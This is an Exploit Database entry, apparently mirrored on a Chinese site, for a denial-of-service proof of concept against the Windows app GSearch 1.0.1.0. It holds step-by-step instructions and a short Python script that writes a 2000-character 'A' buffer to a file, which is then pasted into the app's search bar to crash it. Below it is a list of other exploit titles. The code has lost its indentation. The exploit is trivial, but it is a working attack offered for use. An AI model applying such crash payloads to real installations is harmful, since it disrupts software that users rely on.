GSearch 1.0.1.0 – Denial of Service (PoC)

Exploit Database
91 阅读

作者： 0xB9

日期： 2019-06-24
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/47026/

# Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
# Date: 6/23/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
# Version: 1.0.1.0
# Tested on: Windows 10

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# Click any link and app will crash


buffer = "A" * 2000
payload = buffer
try:
f = open("PoC.txt", "w")
print("[+] Creating payload..")
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created")

last Exploits
GSearch 1.0.1.0 – Denial of Service (PoC)的更多信息

Microsoft Office 2007 – ‘wwlib.dll’ Type Confusion (MS15-081)：
Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 – Buffer Overflow：
Total Video Player 1.31 – ‘.m3u’ Crash (PoC)：
Wireshark – file_read ‘wtap_read_bytes_or_eof/mp2t_find_next_pcr’ Stack Buffer Overflow：
Media Player Classic 1.3.1774.0 – ‘.rm’ Buffer Overflow (PoC)：
VMware Workstation – ‘vprintproxy.exe’ TrueType NAME Tables Heap Buffer Overflow (PoC)：
TECO SG2 FBD Client 3.51 – ‘.gfb’ Overwrite Buffer Overflow (SEH) (PoC)：
Folder Lock 7.7.9 – Denial of Service：